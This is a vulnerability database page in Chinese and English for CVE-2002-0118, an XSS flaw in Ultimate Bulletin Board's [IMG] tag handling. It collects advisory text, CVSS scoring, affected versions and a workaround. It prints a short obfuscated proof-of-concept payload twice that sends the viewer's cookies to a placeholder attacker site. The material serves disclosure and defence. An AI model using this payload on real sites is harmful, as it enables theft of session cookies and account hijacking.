CVE-2002-0118
CVSS7.5
发布时间 :2002-03-25 00:00:00
修订时间 :2008-11-04 00:23:04
NMCOES    

[原文]Cross-site scripting vulnerability in Infopop Ultimate Bulletin Board (UBB) 6.2.0 Beta Release 1.0 allows remote attackers to execute arbitrary script and steal cookies via a message containing encoded Javascript in an IMG tag.


[CNNVD]Ultimate Bulletin Board存在跨站脚本执行漏洞(CNNVD-200203-057)

        
        UBB (Ultimate Bulletin Board)是一款商业性质的WEB论坛/社区程序,由PERL语言实现,可以运行在unix/linux,MacOS,Microsoft Windows 9x/ME/NT/2000/XP系统平台下。
        UBB对用户输入过滤上存在漏洞,可使远程攻击者利用在论坛上发贴对其他浏览用户进行跨站脚本执行攻击。
        UBB支持在帖子中用户使用[img]/[/img]标记插入图象连接,但它未对标记中的内容做充分过滤,这可能导致攻击者在此标记的内容中放入脚本代码,当其他用户浏览相关此连接的时候,脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于COOKIE的认证信息。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:infopop:ultimate_bulletin_board:6.0beta
cpe:/a:infopop:ultimate_bulletin_board:6.0
cpe:/a:infopop:ultimate_bulletin_board:6.0.2
cpe:/a:infopop:ultimate_bulletin_board:6.2.0_beta_release_1.0
cpe:/a:infopop:ultimate_bulletin_board:6.0.3
cpe:/a:infopop:ultimate_bulletin_board:5.4.7e
cpe:/a:infopop:ultimate_bulletin_board:5.43
cpe:/a:infopop:ultimate_bulletin_board:6.0.1
cpe:/a:infopop:ultimate_bulletin_board:6.0.4f

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0118
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0118
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-057
(官方数据源) CNNVD

- 其它链接及资源

http://online.securityfocus.com/archive/1/249031
(VENDOR_ADVISORY)  BUGTRAQ  20020108 CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]
http://www.securityfocus.com/bid/3829
(UNKNOWN)  BID  3829
http://www.iss.net/security_center/static/7838.php
(VENDOR_ADVISORY)  XF  ultimatebb-encoded-css(7838)

- 漏洞信息

Ultimate Bulletin Board存在跨站脚本执行漏洞
高危 输入验证
2002-03-25 00:00:00 2005-10-20 00:00:00
远程  
        
        UBB (Ultimate Bulletin Board)是一款商业性质的WEB论坛/社区程序,由PERL语言实现,可以运行在unix/linux,MacOS,Microsoft Windows 9x/ME/NT/2000/XP系统平台下。
        UBB对用户输入过滤上存在漏洞,可使远程攻击者利用在论坛上发贴对其他浏览用户进行跨站脚本执行攻击。
        UBB支持在帖子中用户使用[img]/[/img]标记插入图象连接,但它未对标记中的内容做充分过滤,这可能导致攻击者在此标记的内容中放入脚本代码,当其他用户浏览相关此连接的时候,脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于COOKIE的认证信息。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修复之前暂时关闭Image标记的使用。
        厂商补丁:
        Infopop
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.infopop.com/products/ubb/

- 漏洞信息 (21209)

Ultimate Bulletin Board 5.4/6.0/6.2 Cross-Agent Scripting Vulnerability (EDBID:21209)
cgi webapps
2002-01-09 Verified
0 Obscure
N/A [点击下载]
source: http://www.securityfocus.com/bid/3829/info

UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000.

UBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running UBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials. 

The following example will send cookie-based authentication credentials to the attacker's site:

[IMG]javascript:document.write
&#x28;'<img%20src=&#x68;tt&#x70;://attackersite/tools/cookie.plx?
cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
[/IMG] 		

- 漏洞信息

8858
Ultimate Bulletin Board Infopop IMG Tag XSS
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

Ultimate Bulletin Board contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate the contents of a specially mangled script, as certain keywords as 'javascript' and 'cookie' are filtered for, but script can still be, using HTML and ASCII hex to obscure the filtered words, inserted into [IMG][/IMG] tags upon submission to the messaging system script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

- 时间线

2002-01-08 Unknow
2002-01-08 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ultimate Bulletin Board Cross-Agent Scripting Vulnerability
Input Validation Error 3829
Yes No
2002-01-09 12:00:00 2009-07-11 09:56:00
This issue was reported to BugTraq on January 9th, 2002 by "Obscure" <obscure@eyeonsecurity.net>.

- 受影响的程序版本

Infopop Ultimate Bulletin Board 6.2 .0 Beta Release 1.0
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.18
- Apache Software Foundation Apache 1.3.18
- Apache Software Foundation Apache 1.3.17
- Apache Software Foundation Apache 1.3.17
- Microsoft IIS 5.0
- Microsoft IIS 4.0
Infopop Ultimate Bulletin Board 6.0.4 f
Infopop Ultimate Bulletin Board 6.0.3
Infopop Ultimate Bulletin Board 6.0.2
Infopop Ultimate Bulletin Board 6.0.1
Infopop Ultimate Bulletin Board 6.0 Beta
- Debian Linux 2.2
- HP HP-UX 11.11
- OpenBSD OpenBSD 2.8
- RedHat Linux 7.0
- Sun Solaris 8_sparc
Infopop Ultimate Bulletin Board 6.0
Infopop Ultimate Bulletin Board 5.43
Infopop Ultimate Bulletin Board 5.4.7 e

- 漏洞讨论

UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000.

UBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running UBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials.

- 漏洞利用

The following example will send cookie-based authentication credentials to the attacker's site:

[IMG]javascr&amp;#x69;pt:document.wr&amp;#x69;te
&amp;#x28;'&lt;img%20src=&amp;#x68;tt&amp;#x70;://attackersite/tools/cookie.plx?
cookie='+escape&amp;#x28;document.cook&amp;#x69;e&amp;#x29;+'&gt;'&amp;#x29;
[/IMG]

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站